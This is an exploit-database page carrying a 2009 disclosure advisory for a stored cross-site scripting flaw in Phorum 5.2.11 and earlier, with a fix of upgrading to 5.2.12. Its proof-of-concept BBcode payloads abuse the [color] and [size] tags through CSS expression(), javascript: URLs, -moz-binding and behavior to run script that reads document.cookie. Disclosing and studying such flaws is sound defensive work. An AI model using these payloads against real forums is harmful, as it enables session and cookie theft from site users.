0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Phorum <= 5.2.11 Permanent Cross Site Scripting Vulnerabilities
=============================================================== Phorum <= 5.2.11 Permanent Cross Site Scripting Vulnerabilities =============================================================== //----- Advisory Program : Phorum 5.2.11 and prior Homepage : http://www.phorum.org/ Discovery : 2009/07/16 Author Contacted : 2009/07/17 Found by : CrashFr This Advisory : CrashFr //----- Application description Started in 1998, Phorum was the original PHP and MySQL based Open Source forum software. Phorum's developers pride themselves on creating message board software that is designed to meet different needs of different web sites while not sacrificing performance or features. //----- Description of vulnerability Phorum's filtering engine insufficiently filters some BBcode arguments. Using the bbcode tags [color] and [size] it is possible to execute Javascript using expression CSS property. //----- Proof Of Concept When the user post the following bbcode : [color=#000000;xss:expression(alert(document.cookie));]Sysdream Testing XSS[/color] or [size=20px;xss:expression(alert(document.cookie));]Sysdream Testing XSS[/size] The application convert it into the follow HTML code : <span style="color:#000000;xss:expression(alert(document.cookie));">Sysdream Testing XSS</span> and <span style="font-size: 20px;xss:expression(alert(document.cookie));">Sysdream Testing XSS</span> For IE6 you can use this POC: [color=#000000;background-image:url(javascript:alert('Sysdream_IE6_Alert'));]Sysdream Testing IE6[/color] For IE7: [color=#000000;xss:expression(alert('Sysdream_IE7_Alert'));]Sysdream Testing XSS[/color] Obviously, the POC doesn't work in IE8 and Firefox. But, but , but... Uploading htc (for IE8) or xml (for FF) file on the phorum using the "My Files" function in "Control Center", you can use : POC for FF: [color=#000000;-moz-binding:url(http://127.0.0.1/phorum/file.php?0,file=9,filename=script.xml#mycode);]Sysdream Testing FF[/color] POC for IE8: [color=#000000;behavior:url(http://127.0.0.1/phorum/file.php?0,file=8,filename=script.htc);]Sysdream Testing FF[/color] //----- Impact This vulnerability can be used to modify the phorum display, to gather the victim's cookie, etc. //----- Solution Upgrade Phorum to 5.2.12 # 0day.today [2024-12-26] #